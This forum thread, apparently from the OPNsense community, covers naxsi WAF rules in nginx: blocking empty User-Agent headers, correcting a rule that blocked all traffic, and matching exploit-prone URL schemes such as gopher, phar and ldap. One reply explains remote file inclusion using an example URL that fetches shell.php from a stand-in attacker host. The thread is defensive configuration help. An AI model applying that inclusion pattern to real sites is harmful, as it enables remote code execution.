Hello,
I know nginx can use hook to add block empty user-agent.I want know naxsi could support it?
it should
may be something like:
MainRule negative id:1700 "rx:^(?!\s*$).+" "msg:Empty_UA" "mz:$HEADERS_VAR_X:User-Agent"
not tested
OK,I will test it.Thanks a lot.
I test it.It's can't block it.
test it. works
curl -H "User-Agent;" http://myCA_CRL_URL
*32507 NAXSI_EXLOG: ip=some_ip&server=my_serever&uri=%2Fcrl_file&id=1700&zone=HEADERS&var_name=user-agent&content=, client: some_ip, server: my_server, request: "GET /my.crl HTTP/1.1", host: "my_server
If you try
Quotecurl -A '' -H 'User-Agent;' http://web -I
Sorry,I make mistake.It's can block it.Thanks a lot.
I want know about naxsi.It's can choose drop connection this option.What the different block request and drop connection?I test it.I feel no different.
https://github.com/nbs-system/naxsi/wiki/rules-bnf
Quotespecifiy an action such a BLOCK (blocks the request in non-learning mode) or DROP (blocks the request even in learning mode)
DROP is not "DROP connection". its block even in learning mode
So,Whatever choose block request or drop connection it's always show opnsense request denied webpage.
Right?
yep
Quote from: Fright on November 05, 2020, 11:08:32 AM
it should
may be something like:
MainRule negative id:1700 "rx:^(?!\s*$).+" "msg:Empty_UA" "mz:$HEADERS_VAR_X:User-Agent"
not tested
Hello,I test it.
If I use browers like firefox to see http://ab.aspa.idv.tw.It's also show Request Denied.
You can check http://ab.aspa.idv.tw
and whats in the "HTTP Error logs" for this requests?
Quote*19 NAXSI_FMT: ip=219.84.34.52&server=ab.aspa.idv.tw&uri=/&learning=0&vers=0.56&total_processed=12&total_blocked=10&block=1&cscore0=$policy20906cd5e25e413f9fe6e733c38d3586&score0=16&zone0=HEADERS&id0=15001&var_name0=user-agent&zone1=HEADERS|NAME&id1=15001&var_name1=user-agent, client: 219.84.34.52, server: ab.aspa.idv.tw, request: "GET / HTTP/1.1", host: "ab.aspa.idv.tw"
Quote*19 NAXSI_FMT: ip=219.84.34.52&server=ab.aspa.idv.tw&uri=/favicon.ico&learning=0&vers=0.56&total_processed=13&total_blocked=11&block=1&cscore0=$policy20906cd5e25e413f9fe6e733c38d3586&score0=16&zone0=HEADERS&id0=15001&var_name0=user-agent&zone1=HEADERS|NAME&id1=15001&var_name1=user-agent, client: 219.84.34.52, server: ab.aspa.idv.tw, request: "GET /favicon.ico HTTP/1.1", host: "ab.aspa.idv.tw", referrer: "http://ab.aspa.idv.tw/"
Quotezone1=HEADERS|NAME
and how exactly rule 15001 looks like?
and can you enable "Extensive Naxsi Log" in server properties and post NAXSI_EXLOG log for blocked request?
QuoteMainRule id:15001 "rx:^(?!\s*$).+" "msg:Empty UA" "mz:$HEADERS_VAR_X:User-Agent" "s:$policy20906cd5e25e413f9fe6e733c38d3586:8";
Quoteand can you enable "Extensive Naxsi Log" in server properties and post NAXSI_EXLOG log for blocked request?
Where is these setup?on opnsense?or web server?
QuoteMainRule id:15001 "rx:^(?!\s*$).+" "msg:Empty UA" "mz:$HEADERS_VAR_X:User-Agent"
forgot to negate? now you blocking any request with non-empty UA header
MainRule negative id:15001 "rx:^(?!\s*$).+" "negative" to block request that does not satisfy non-emtpy UA
QuoteWhere is these setup?on opnsense?or web server?
OPN->services->Nginx->configuration->Edit HTTP Server->advanced mode
Ohh...Sorry,I miss this option.Thanks a lot.
Please see follow:
QuoteMainRule id:10000 "str:gopher|doc|php|glob|file|phar|zlib|ftp|ldap|dict|ogg|data\:\/" "msg:URL charset" "mz:URL" "s:$policy1a275df7733e4aef813ecb4917637d
40:8"
I want block some charset on url.Could I set wrong?
Quote"str:gopher|doc|php|glob|file|phar|zlib|ftp|ldap|dict|ogg|data\:\/"
since you use regex its should be "rx:" not "str:"
what "\:\/" part for?
Sorry,the full rule I fix it.
QuoteMainRule id:10000 "rx:(gopher|doc|php|glob|file|phar|zlib|ftp|ldap|dict|ogg|data)\:\/" "msg:URL charset" "mz:URL" "s:$policy1a275df7733e4aef813ecb4917637d40:8";
I want block url string have like ftp:/ or ldap:/ this string.I has edit to rx.Is right?
regex looks fine but
can you show an example of url you want to block?
URL zone contain string between server name and first "?" sign (ie if https://forum.opnsense.org/index.php?action=post requested then URL = /index.php, "action" is Argument. Arguments of POST request is in BODY zone).
so what exactly you want to block?
like
http://url/php:/
hm. if the question is theoretical, then yes. rule should work.
but RFI (remote file inclusion) works by parameters (arguments), not url itself
(ie http://www.example.com/vuln_page.php?file=http://www.hacker.com/shell.php)
and naxsi have examples of obvious rfi protecion (IDs:1100-1199)
Hello,
Could I redirect client 403 page when rule match?
I did not understand the question.
you want to send 403 status? change html page?
yes you can
https://github.com/nbs-system/naxsi/wiki/directives#deniedurl
Quotewhen rule match?
when access blocked.
DeniedUrl is directive in location block. you cant set it for one rule